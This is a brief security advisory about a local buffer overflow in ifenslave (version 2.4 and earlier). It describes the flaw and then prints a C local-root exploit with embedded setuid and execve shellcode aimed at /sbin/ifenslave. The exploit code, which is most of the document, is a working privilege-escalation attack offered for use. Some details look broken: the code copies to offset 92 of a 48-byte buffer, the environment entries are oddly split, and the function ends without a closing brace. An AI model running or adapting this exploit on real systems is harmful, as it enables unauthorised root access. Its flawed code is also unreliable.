Summary
ifenslave is "a tool to attach and detach slave network devices to a bonding device. A bonding device will act like a normal Ethernet network device to the kernel, but will send out the packets via the slave devices using a simple round-robin scheduler. This allows for simple load-balancing, identical to "channel bonding" or "trunking" techniques used in switches".

A buffer overflow in ifenslave allows an attacker to run arbitrary code with root privileges on a vulnerable machine.

Credit:
The original article can be found at: http://icis.digitalparadox.org/~dcrab/dc_ifenslave.c

Details
Vulnerable Systems:
* Ifenslave version 2.4 and prior

Exploit Code:
//Diabolic Crab's Local Root Exploit
// /sbin/ifenslave
//dcrab at hackerscenter
//www.hackerscenter.com

#include <stdio.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main(int argc,char **argv){
char buf[48];
unsigned long ret;
int i;

char *prog[]={"/sbin/ifenslave",buf,NULL};
char *env[]={"EGG=",shellcode,NULL};

ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
printf("use ret addr: 0x%x\n",ret);

memset(buf,0x41,sizeof(buf));
memcpy(&buf[92],&ret,4);

execve(prog[0],prog,env);